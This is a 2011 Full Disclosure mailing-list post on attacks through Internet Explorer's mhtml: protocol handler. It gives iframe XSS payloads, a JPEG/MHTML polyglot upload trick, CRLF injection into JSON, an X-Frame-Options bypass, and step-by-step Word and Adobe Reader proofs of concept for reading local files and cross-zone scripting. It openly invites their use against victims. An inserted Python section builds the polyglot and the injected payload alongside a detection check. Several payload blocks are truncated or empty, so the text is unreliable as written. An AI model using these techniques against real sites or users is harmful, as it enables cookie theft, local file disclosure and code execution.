
Full Disclosure mailing list archives

Hacking with mhtml protocol handler
From: IEhrepus <5up3rh3i () gmail com>
Date: Sat, 15 Jan 2011 01:12:15 -0800

Hacking with mhtml protocol handler

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15

Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) was finally
released yesterday. It contains two articles on browser security [0x05
and 0x06]; combining the two lets us do a lot of interesting things.

1. Cross Site Scripting by uploading an mhtml file

The mhtml protocol handler ignores the file extension, so the attacker can
rename an mhtml file to *.jpg (or any other extension) and upload it to the
target site.

Of course, "copy /b 1.jpg + 1.mhtml 2.jpg" can be used to get past some
upload file-format restrictions: the result still begins with the JPEG
bytes, but the mhtml document is carried after them.

Then point an iframe src at it:

<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie"></iframe>

2. Cross Site Scripting by mhtml-file string injection

The mhtml file format is based only on CRLF line breaks, so if we can inject
CRLF into a response, the site may be attacked.


Test it on a Win7 system please.

<iframe src="mhtml:

On a WinXP or Win2k3 system, URL-encode it a second time.

mhtml-file string injection into a JSON file: some sites restrict the JSON
file's Content-Type to defend against XSS. Maybe we can use mhtml-file
string injection to get past that :)
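The following is an added example (not code from the original post) modelling the handler behaviour described in sections 1 and 2: the extension is ignored, and a CRLF-delimited MIME container is parsed out of whatever response the mhtml: URL points at. It builds the .jpg+.mhtml polyglot of section 1, reflects the same container through a CRLF hole into a JSON body as in section 2, and adds the server-side check a site would want for both. Assumptions: IE's real parsing rules are not on the page, so the model simply locates the first "Content-Type: multipart/related" header anywhere in the bytes and hands the remainder to Python's MIME parser, and it resolves the part name after "!" in mhtml:URL!name against each part's Content-Location; the JPEG stub, JSON responder and script payload are constructed sample data.

```python
# Added example, not code from the original post: a small model of the
# behaviour the post attributes to the mhtml: handler (extension ignored,
# a CRLF-delimited MIME container parsed out of an arbitrary response).
# ASSUMPTIONS: IE's real parsing rules are not on the page; this model finds
# the first "Content-Type: multipart/related" header anywhere in the bytes and
# hands the remainder to Python's MIME parser, and it resolves the part name
# after "!" in mhtml:URL!name against each part's Content-Location.
import base64
import re
from email import message_from_bytes
from typing import Optional

MIME_HEADER = re.compile(rb"(?i)content-type:[ \t]*multipart/related")

# Constructed sample payload: the script the attacker wants run in the target
# origin.  Base64-encoding the part keeps '<' and '"' out of the injected
# bytes, so it survives a site that HTML-escapes or quotes what it reflects.
PAYLOAD = b"<script>alert(document.cookie)</script>"


def build_mhtml(part_name: str, html: bytes, boundary: str = "_b") -> bytes:
    """Build a minimal multipart/related document with one named part.
    The boundary is left unquoted so no '"' characters are needed."""
    head = (
        f"Content-Type: multipart/related; boundary={boundary}\r\n\r\n"
        f"--{boundary}\r\n"
        f"Content-Location: {part_name}\r\n"
        f"Content-Transfer-Encoding: base64\r\n\r\n"
    ).encode()
    return head + base64.b64encode(html) + f"\r\n--{boundary}--\r\n".encode()


def extract_part(data: bytes, part_name: str) -> Optional[bytes]:
    """Model of mhtml:<url>!<part_name>: everything before the MIME header
    (JPEG bytes, JSON, whatever) is ignored; the named part body is returned."""
    m = MIME_HEADER.search(data)
    if m is None:
        return None
    msg = message_from_bytes(data[m.start():])
    for part in msg.walk():
        if part.get("Content-Location") == part_name:
            return part.get_payload(decode=True)
    return None


def looks_like_mhtml(body: bytes) -> bool:
    """Server-side check: refuse an upload, or a response that embeds user
    input, if its bytes could be parsed as an MHTML container.  Deliberately
    ignores the extension and the declared Content-Type, since the handler does."""
    return MIME_HEADER.search(body) is not None


def reflect_into_json(user_value: bytes) -> bytes:
    """Constructed vulnerable responder for section 2: reflects a value into
    JSON without escaping CR/LF, which is the defect the injection needs."""
    return b'{"status":"ok","name":"' + user_value + b'"}'


# Section 1: "copy /b 1.jpg + 1.mhtml 2.jpg".  JPEG_STUB is a constructed
# minimal JFIF header, enough to satisfy a magic-byte upload filter.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 8 + b"\xff\xd9"
POLYGLOT = JPEG_STUB + build_mhtml("cookie", PAYLOAD)

# Section 2: the same container injected through a CRLF hole into a JSON body
# whose Content-Type restriction the handler never looks at.
INJECTED_RESPONSE = reflect_into_json(b"aaa\r\n" + build_mhtml("cookie", PAYLOAD))

if __name__ == "__main__":
    print("polyglot starts with JPEG magic:", POLYGLOT[:2] == b"\xff\xd8")
    print("mhtml:.../2.jpg!cookie ->", extract_part(POLYGLOT, "cookie"))
    print("mhtml:.../data.json!cookie ->", extract_part(INJECTED_RESPONSE, "cookie"))
    print("clean JSON yields a part?", extract_part(reflect_into_json(b"alice"), "cookie"))
    for name, blob in (("jpeg", JPEG_STUB), ("polyglot", POLYGLOT), ("json", INJECTED_RESPONSE)):
        print(f"looks_like_mhtml({name}) = {looks_like_mhtml(blob)}")
```

The point of the polyglot is that both the extension and the magic bytes check out, yet the part named "cookie" is still reachable through mhtml:. The check in looks_like_mhtml is intentionally blunt: a multipart/related header has no business inside an image upload or a JSON response, so rejecting on its presence costs nothing and removes what the handler needs.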

3. Bypass X-Frame-Options

X-Frame-Options does not protect against the mhtml protocol handler.

The demo (the same page framed through mhtml: and framed directly):

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>

4. mhtml+file://uncpath+Adobe Reader 9 == local xss vul

Billy (BK) Rios introduced a very interesting approach to stealing local
files at RuxCon/BayThreat (https://xs-sniper.com/blog/2010/12/17/will-it-blend/).
It used "script src to local files in the LocalLow directory" via file://
+ Java applet + Adobe Reader + Adobe Flash to pull it off. With
mhtml+file://uncpath it is much easier to do.


Test it on win2k3 + IE8 + Adobe Reader 9.


5. mhtml+file://uncpath+word == local xss vul


Download it, save it as c:\word.doc and open it. You get an alert with the
contents of c:\boot.ini.

This is based on "Microsoft word javascript execution" (

To build the proof of concept, follow these steps:

1-Make an html file and paste the xss code into it
2-Open the html file with Word and save it as c:\word.xml
3-Open word.xml with Notepad and inject the mhtml code in <w:t>aaaaa
4-Rename c:\word.xml to c:\word.doc
5-Open the c:\word.doc file

xss code
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>

mhtml code
Content-Type: multipart/related; boundary="_boundary_by_mere":




If you use this vulnerability to attack someone, you need to know the path
where the downloaded Word file is saved, and lots of people save to the
desktop :)

"Microsoft word javascript execution" only works on Office 2k3 and 2k7. In
other versions you can make the link and point its src to

6. Cross Zone Scripting

First we would like to mention a very old vulnerability:

<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111

This vulnerability (by firebug9[
allows you to execute any program in the "My Computer" zone. Tested and
found to work on IE6/IE7/IE8 + Win2k/WinXP/Win2k3.

Then repeat the steps of "5. mhtml+file://uncpath+word == local xss vul" and change:

xss code
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>

mhtml code
Content-Type: multipart/related; boundary="_boundary_by_mere":




Thanks to d4rkwind (http://hi.baidu.com/d4rkwind/) for his excellent paper.

About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network security magazine. We accept articles in
English and Chinese; contributions are welcome.
Please mail root_at_ph4nt0m.org. Thank you!

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
